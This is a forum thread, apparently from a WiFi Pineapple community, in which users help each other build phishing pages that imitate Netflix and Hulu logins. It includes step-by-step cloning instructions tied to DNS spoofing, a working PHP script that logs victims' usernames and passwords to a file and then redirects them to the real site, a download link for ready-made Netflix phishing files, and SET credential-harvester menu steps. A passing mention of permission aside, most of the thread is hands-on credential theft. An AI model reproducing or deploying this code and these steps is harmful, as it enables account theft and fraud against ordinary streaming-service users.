Jump to content

Wanted Phishing Pages


mreidiv

Recommended Posts

Has anyone got netflix or hulu to work with phishing. i tried following the tut but the code is different in these sites. If so can you send me the files so i can see how it was done or give me a tut.

Link to comment
Share on other sites

Check on YouTube guys. There's loads of videos out there on how to create a phishing page and also there's great tuts on a guys page on YouTube called security4plus. He started me off as I was completely lost. Slowly things start to make sense and you can soon realise you can use your imagination to modding the pineapple to how you like. Hope it helps! And make sure u like that guys videos. He's been knocking new ones out constantly! :)

Link to comment
Share on other sites

Check on YouTube guys. There's loads of videos out there on how to create a phishing page and also there's great tuts on a guys page on YouTube called security4plus. He started me off as I was completely lost. Slowly things start to make sense and you can soon realise you can use your imagination to modding the pineapple to how you like. Hope it helps! And make sure u like that guys videos. He's been knocking new ones out constantly! :)

Thank you killuminati but what i was looking for is a tutorial on defrent types of phishing web pages like netflix and hulu the use diffrent encoding in their web pages so i would like to know how to set them pages up for phishing.

Link to comment
Share on other sites

Looking at the source files for Netflix,

The actual login.php page is not on the home page.

Why dont you try the following?

  • Clone/Copy the standard front page of netflix and the login.php page to your MKIV
  • Find the link to login.php and change it your desired location
  • In the login.php from the website, and change the action method as suggested in the tutorials.
  • Should work !

Try this and play around.

Extra bonus points for learning basic html and php ! B)

Link to comment
Share on other sites

Looking at the source files for Netflix,

The actual login.php page is not on the home page.

Why dont you try the following?

  • Clone/Copy the standard front page of netflix and the login.php page to your MKIV
  • Find the link to login.php and change it your desired location
  • In the login.php from the website, and change the action method as suggested in the tutorials.
  • Should work !

Try this and play around.

Extra bonus points for learning basic html and php ! B)

thank you i have cloned the login and the first page and have tried changing by the tutorial on the web page but there is no "Action" in either page i have tried changing the href=.... to error.php to no avail, also i am working on learning html and php but once you try things many of time you get to a point where it just drives you crazy. so that is why i cam to the conclusion to ask for a little help form the community.

Link to comment
Share on other sites

Change it to a button that you can control so (point to error.php).

The easiest thing to do is keep a 'snippets' tool handy and copy any 'useful' bits of code into it. That way, when you quickly want to change an element on a web page, you have a predefined bit of code that you need.

With php/html, you can't do any damage, so play around and have fun!

Link to comment
Share on other sites

  • 2 weeks later...

edited.. not changed up.

one phish page I have is like this:

www.target.com (line in dnspoof)

since this site has a follow up signon of:

https://online.target.com/signon

I can use:

header('Location: https://online.target.com/signon");

and the user is presented with the REAL logon page. (after params are written to phish.log) not perfect, but I am still working on this.

does NOT work if you are redirecting back to the same url you are spoofing.

*wish I new how to write PHP..but googling my way along*

NTF

Edited by NotTheFed
Link to comment
Share on other sites

<?php

$ref = $_SERVER['HTTP_REFERER'];

$today = date("F j, Y, g:i a");

if (isset($_POST['name']) && !empty($_POST['name'])) {

$nam = stripslashes($_POST['name']);

$pas = stripslashes($_POST['pass']);

$nam = htmlspecialchars($nam, ENT_QUOTES);

$pas = htmlspecialchars($pas, ENT_QUOTES);

$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;

$filed = @fopen("/usb/logs/phish.log", "a+");

@fwrite($filed, "$content\n");

@fclose($filed);

}

if ($ref=="http://www.targetsite.com/targetsite.html")

header("Location: https://online.targetsite.com/signon/");

?>

<html><head>

<script type="text/javascript">

function goBack()

{

window.history.back()

}

</script>

</head>

<body onload="goBack()">

</body></html>

THIS works.. and can be built up... redirection for the known sites that work, back\refresh for others.

getting closer.. now if I can do the post portion.

NTF

Link to comment
Share on other sites

These are super easy to setup guys, just follow these steps:

1) Pull up the page you need

2) Save the page

3) Open the page in a txt editor and remove all of the scripts that aren't necessary for the landing page

3) Download all resources on the page (images, css, etc) and put them into a folder ie "netflix" with the main page saved as netflix.html

4) Edit the main page and where you see the <form> tags for logging in, just change the POST method to error.php and set the username and password "name" attribute to name and pass respectively.

5) Your done!

I will be releasing an updated phishing package in the near future containing an easy harvesting method, the one thing I am trying to figure out is how to redirect them to the real site after they have entered the credentials on the fake site.

The issue I am having here is that this will probably need to effect iptables because we do not want dnsspoof to be redirecting them for just this single domain we are dealing with.

Link to comment
Share on other sites

If you guys want to clone a site like hulu's login page, just use (SET) on the backtrack security cd.

Use the clone option and then use the saved html that SET builds. I don't think I will create a tutorial for this as I am really not sure what your ideas behind this are. If you figure it out more power to ya.

-suRbo

Link to comment
Share on other sites

If you guys want to clone a site like hulu's login page, just use (SET) on the backtrack security cd.

Use the clone option and then use the saved html that SET builds. I don't think I will create a tutorial for this as I am really not sure what your ideas behind this are. If you figure it out more power to ya.

-suRbo

Thank You suRbo

But the idea is to learn how to do it manually with the different types of encoding on different pages. I am here to learn how to do things not be a script kiddie.. Lol

btw: SET wont generate a clone for netflix

But thanks for your input.

Edited by mreidiv
Link to comment
Share on other sites

here are the ones I use for netflix

http://www.filefactory.com/file/7i14ry677cud/n/Archive_zip

I use the net for all the .jpg

with this site I use the main landing page (netflix.html) then the user clicks on (member sign in) that opens NetflixLogin.html

the login.php then writes the name\pass to /usb/logs/phish.log and redirects to the real netflix site.

NTF

*edit* you will have to change the part for the redirect for netflix. didnt get that copied over to the login.php

should be:

Edited by NotTheFed
Link to comment
Share on other sites

here are the ones I use for netflix

http://www.filefactory.com/file/7i14ry677cud/n/Archive_zip

I use the net for all the .jpg

with this site I use the main landing page (netflix.html) then the user clicks on (member sign in) that opens NetflixLogin.html

the login.php then writes the name\pass to /usb/logs/phish.log and redirects to the real netflix site.

NTF

Thank you, NotTheFed,

I will study it and see how you accomplished it.

Link to comment
Share on other sites

Thank You suRbo

But the idea is to learn how to do it manually with the different types of encoding on different pages. I am here to learn how to do things not be a script kiddie.. Lol

btw: SET wont generate a clone for netflix

But thanks for your input.

I will give it a go since you are not a skiddie =) You can reverse it for your education

Link to comment
Share on other sites

I will give it a go since you are not a skiddie =) You can reverse it for your education

SET options

2 Website Attack Vectors

3 Credential Harvester Attack Method

2 Site Cloner

put in the url you wish to clone use https or http

Please make sure you have permission to test

-later

Link to comment
Share on other sites

SET options

2 Website Attack Vectors

3 Credential Harvester Attack Method

2 Site Cloner

put in the url you wish to clone use https or http

Please make sure you have permission to test

-later

Thanks surbo,

if it worked for you something may be messed up with mine it just sits there for about an hour and a half before it errors out. i used the same steps u described.

Link to comment
Share on other sites

All in one captive portal

Hotspotscreenshot.png

Mad Props For VulpiArgenti

All i did was edit the paths to work on the pineapple

No credit to me Only VulpiArgenti

Can be used As a captive portal Login in page.

Down Load Pinapple Version Here

Or the Original Here.

Edited by mreidiv
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...